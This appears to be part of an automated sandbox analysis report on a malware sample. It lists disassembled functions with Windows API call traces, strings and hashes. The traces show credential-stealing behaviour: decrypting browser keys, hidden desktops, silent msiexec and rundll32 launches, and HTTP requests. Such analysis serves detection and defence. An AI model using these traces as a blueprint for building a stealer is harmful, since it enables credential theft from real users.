                                              • Opcode ID: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                              • Instruction ID: 4fdc336044367871c69213567fe42fce90f61d04e08d5fff212e48b059342ccf
                                              • Opcode Fuzzy Hash: 5daa5f6d66ba1f8a50f2ce9c702c93a1a5f276b3eddcebdd6655cdaf5b281942
                                              • Instruction Fuzzy Hash: 2AE13E71D05108ABCB14EBA1DCA6FEEB779AF14304F00419EF10663191EF387A99CB69
                                              Function 0484CCF7 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 383filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 0485AE97: lstrcpy.KERNEL32(00000000,?), ref: 0485AEE9
                                                • Part of subcall function 0485AE97: lstrcat.KERNEL32(00000000), ref: 0485AEF9
                                                • Part of subcall function 0485AE17: lstrcpy.KERNEL32(?,00420E1A), ref: 0485AE7C
                                                • Part of subcall function 0485AF27: lstrlen.KERNEL32(?,006D6BF0,?,004250E4,00420E1A), ref: 0485AF3C
                                                • Part of subcall function 0485AF27: lstrcpy.KERNEL32(00000000), ref: 0485AF7B
                                                • Part of subcall function 0485AF27: lstrcat.KERNEL32(00000000,00000000), ref: 0485AF89
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,006D703C,00000000,?,00421544,00000000,?,?), ref: 0484CDD3
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0484CDF0
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0484CDFC
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0484CE0F
                                              • ??_U@YAPAXI@Z.MSVCRT(-00000001), ref: 0484CE1C
                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0484CE40
                                              • StrStrA.SHLWAPI(?,006D6BB0,00420B56), ref: 0484CE5E
                                              • StrStrA.SHLWAPI(00000000,006D6D64), ref: 0484CE85
                                              • StrStrA.SHLWAPI(?,006D6ED0,00000000,?,00421550,00000000,?,00000000,00000000,?,006D6B5C,00000000,?,0042154C,00000000,?), ref: 0484D009
                                              • StrStrA.SHLWAPI(00000000,006D6ECC), ref: 0484D020
                                                • Part of subcall function 0484CB87: memset.MSVCRT ref: 0484CBBA
                                                • Part of subcall function 0484CB87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0484CBD8
                                                • Part of subcall function 0484CB87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0484CBE3
                                                • Part of subcall function 0484CB87: memcpy.MSVCRT(?,?,?), ref: 0484CC79
                                              • StrStrA.SHLWAPI(?,006D6ECC,00000000,?,00421554,00000000,?,00000000,006D6ADC), ref: 0484D0C1
                                              • StrStrA.SHLWAPI(00000000,006D6FA8), ref: 0484D0D8
                                                • Part of subcall function 0484CB87: lstrcat.KERNEL32(?,00420B47), ref: 0484CCAA
                                                • Part of subcall function 0484CB87: lstrcat.KERNEL32(?,00420B4B), ref: 0484CCBE
                                                • Part of subcall function 0484CB87: lstrcat.KERNEL32(?,00420B4E), ref: 0484CCDF
                                              • lstrlen.KERNEL32(00000000), ref: 0484D1AB
                                              • CloseHandle.KERNEL32(00000000), ref: 0484D203
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                              • String ID:
                                              • API String ID: 1564132460-3916222277
                                              • Opcode ID: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                              • Instruction ID: cd7739e62c3c1d0c24c81f2193f0f914679fd361ee6387daf333cb8019ce6f9a
                                              • Opcode Fuzzy Hash: 855bc2773a8edbe2702640e8442d81e0a176fb990623bce130120e5cf956bf83
                                              • Instruction Fuzzy Hash: C8E1EE71D00118ABDB19EBA8DC90FEEB779AF54304F404B59F506A61A0EFB07A49CF51
                                              Function 0484A097 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 157stringsleepprocessCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 0484A0AE
                                                • Part of subcall function 04858F57: GetSystemTime.KERNEL32(00420E1B,006D6CA4,004205B6,?,?,04841660,?,0000001A,00420E1B,00000000,?,006D6BF0,?,004250E4,00420E1A), ref: 04858F7D
                                              • wsprintfA.USER32 ref: 0484A0E6
                                              • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0484A10A
                                              • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 0484A133
                                              • memset.MSVCRT ref: 0484A154
                                              • lstrcat.KERNEL32(00000000,?), ref: 0484A16A
                                              • lstrcat.KERNEL32(00000000,?), ref: 0484A17E
                                              • lstrcat.KERNEL32(00000000,004212D8), ref: 0484A190
                                              • memset.MSVCRT ref: 0484A1A4
                                              • lstrcpy.KERNEL32(?,00000000), ref: 0484A1E3
                                              • memset.MSVCRT ref: 0484A203
                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,00000000), ref: 0484A26B
                                              • Sleep.KERNEL32(00001388), ref: 0484A27A
                                              • CloseDesktop.USER32(00000000), ref: 0484A2C7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: memset$Desktoplstrcat$Create$CloseOpenProcessSleepSystemTimelstrcpywsprintf
                                              • String ID: D
                                              • API String ID: 1347862506-2746444292
                                              • Opcode ID: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                              • Instruction ID: 3db96887d18b8794723bcb59c0c8f1b5a00c93054802e8839f424f67a0d9be26
                                              • Opcode Fuzzy Hash: 129a72e408785f324dac0317533ad1fd853fd10515b731b54cc373586fca86ea
                                              • Instruction Fuzzy Hash: E551A5B1D44318ABEB24DB64CC89FD97778AF48701F004698F60DAA2D0EBB56B84CF55
                                              Function 004184B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • RegOpenKeyExA.ADVAPI32(00000000,02CA2A98,00000000,00020019,00000000,004205BE), ref: 00418534
                                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                              • wsprintfA.USER32 ref: 004185E9
                                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                              • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                                              • String ID: - $%s\%s$?
                                              • API String ID: 3246050789-3278919252
                                              • Opcode ID: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                              • Instruction ID: c228fa157c9b2873a9233ab8a396ad333d8a8ae6667b392d6015aff843962e7d
                                              • Opcode Fuzzy Hash: 48b3856a4b7a08adbcf43253a443092526ad4724ebfb5700d99c2b9c1c41cab3
                                              • Instruction Fuzzy Hash: 47812D71911118ABDB24DB50DD95FEAB7B9BF08314F1082DEE10966180DF746BC8CFA9
                                              Function 004191A0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 184COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 004191FC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateGlobalStream
                                              • String ID: `dAF$`dAF$image/jpeg
                                              • API String ID: 2244384528-2462684518
                                              • Opcode ID: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                              • Instruction ID: 5957f6d1424668cbfb95915d93d24f68315a2265fb4ab52f55d04562dbc5d918
                                              • Opcode Fuzzy Hash: e2818ee80e84ba607554f161cf3f8b5aa4b01b2fddcad8d08d404cdb47dfdd2d
                                              • Instruction Fuzzy Hash: BE710E71E11208ABDB14EFE4DC95FEEB779BF48300F10851AF516A7290EB34A944CB65
                                              Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,02C9ED80), ref: 00406353
                                                • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,02CA65B8,00000000,00000000,00400100,00000000), ref: 004063D5
                                                • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                              • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                              • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                              • strtok.MSVCRT(00000000,?), ref: 004155EE
                                              • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                              • API String ID: 3532888709-2643084821
                                              • Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                              • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                              • Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                              • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                              Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • strtok_s.MSVCRT ref: 00411557
                                              • strtok_s.MSVCRT ref: 004119A0
                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02C9D528,?,004210F4,?,00000000), ref: 0041AB3B
                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: strtok_s$lstrcpylstrlen
                                              • String ID:
                                              • API String ID: 348468850-0
                                              • Opcode ID: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                              • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                              • Opcode Fuzzy Hash: e52880565d129af28a5f69432b9d54d6fdd3fcd29681398848d849162f015342
                                              • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                              Function 00413080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 00413415
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 004135AD
                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0041373A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExecuteShell$lstrcpy
                                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                              • API String ID: 2507796910-3625054190
                                              • Opcode ID: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                              • Instruction ID: 9b621e5b28039e8226f92625bb5802f9f58bb257d03f06fe20f9cf3dfd15236c
                                              • Opcode Fuzzy Hash: eb03b3a0b22b6dfbba97b23669552248c9f138026661cfac13ec68621a67f2e0
                                              • Instruction Fuzzy Hash: 271241719011189ACB14FBA1DDA2FEDB739AF14314F00419FF10666196EF382B99CFA9
                                              Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 004144EE
                                              • memset.MSVCRT ref: 00414505
                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                              • lstrcatA.KERNEL32(?,02CA5298), ref: 0041455B
                                              • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                              • lstrcatA.KERNEL32(?,02CA5940), ref: 00414583
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                              • StrStrA.SHLWAPI(?,02CA5310), ref: 00414643
                                              • GlobalFree.KERNEL32(?), ref: 00414762
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                              • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                              • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                              • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                              • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 1191620704-0
                                              • Opcode ID: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                              • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                              • Opcode Fuzzy Hash: e6855c9f001d1c02cd0542eea975edd43dd132d7f4dc845d8e99b5bd53663b4c
                                              • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                              Function 04854737 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 04854755
                                              • memset.MSVCRT ref: 0485476C
                                                • Part of subcall function 048591D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 04859202
                                              • lstrcat.KERNEL32(?,00000000), ref: 048547A3
                                              • lstrcat.KERNEL32(?,006D6D0C), ref: 048547C2
                                              • lstrcat.KERNEL32(?,?), ref: 048547D6
                                              • lstrcat.KERNEL32(?,006D6FD8), ref: 048547EA
                                                • Part of subcall function 0485ACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 0485ACFF
                                                • Part of subcall function 04859187: GetFileAttributesA.KERNEL32(00000000,?,04841DFB,?,?,00425784,?,?,00420E22), ref: 04859196
                                                • Part of subcall function 0484A697: StrStrA.SHLWAPI(00000000,00421360), ref: 0484A6F0
                                                • Part of subcall function 0484A697: memcmp.MSVCRT(?,00421244,00000005), ref: 0484A749
                                                • Part of subcall function 0484A377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0484A3A3
                                                • Part of subcall function 0484A377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0484A3C8
                                                • Part of subcall function 0484A377: LocalAlloc.KERNEL32(00000040,?), ref: 0484A3E8
                                                • Part of subcall function 0484A377: ReadFile.KERNEL32(000000FF,?,00000000,048416F6,00000000), ref: 0484A411
                                                • Part of subcall function 0484A377: LocalFree.KERNEL32(048416F6), ref: 0484A447
                                                • Part of subcall function 0484A377: CloseHandle.KERNEL32(000000FF), ref: 0484A451
                                                • Part of subcall function 048597B7: GlobalAlloc.KERNEL32(00000000,04854894,04854894), ref: 048597CA
                                              • StrStrA.SHLWAPI(?,006D6AD8), ref: 048548AA
                                              • GlobalFree.KERNEL32(?), ref: 048549C9
                                                • Part of subcall function 0484A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4A6
                                                • Part of subcall function 0484A477: LocalAlloc.KERNEL32(00000040,?,?,?,048451A5,00000000,?), ref: 0484A4B8
                                                • Part of subcall function 0484A477: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,048451A5,00000000,00000000), ref: 0484A4E1
                                                • Part of subcall function 0484A477: LocalFree.KERNEL32(?,?,?,?,048451A5,00000000,?), ref: 0484A4F6
                                                • Part of subcall function 0484A7C7: memcmp.MSVCRT(?,0042124C,00000003), ref: 0484A7E4
                                              • lstrcat.KERNEL32(?,00000000), ref: 0485495A
                                              • StrCmpCA.SHLWAPI(?,004208D2), ref: 04854977
                                              • lstrcat.KERNEL32(00000000,00000000), ref: 04854989
                                              • lstrcat.KERNEL32(00000000,?), ref: 0485499C
                                              • lstrcat.KERNEL32(00000000,00420FA0), ref: 048549AB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2288724291.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_4840000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                              • String ID:
                                              • API String ID: 1191620704-0
                                              • Opcode ID: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                              • Instruction ID: 02bdabf9e528b8fa7ed906657065f3b3101882e30b38f5bcc9dc403da1b02b39
                                              • Opcode Fuzzy Hash: 5e7d088db62709dc0ccde8baf0395fa2f3c858227df9e8cbd07930c03f7cc80d
                                              • Instruction Fuzzy Hash: 9A7176B1D00218ABDB14EBA4DC89FEE7779AF88304F044A99E905E7190EB75EB44CF51
                                              Function 00401310 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139stringfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • memset.MSVCRT ref: 00401327
                                                • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                              • lstrlenA.KERNEL32(?), ref: 0040135C
                                              • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                • Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02CA08F8,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16
                                                • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                              • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                              • memset.MSVCRT ref: 00401516
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
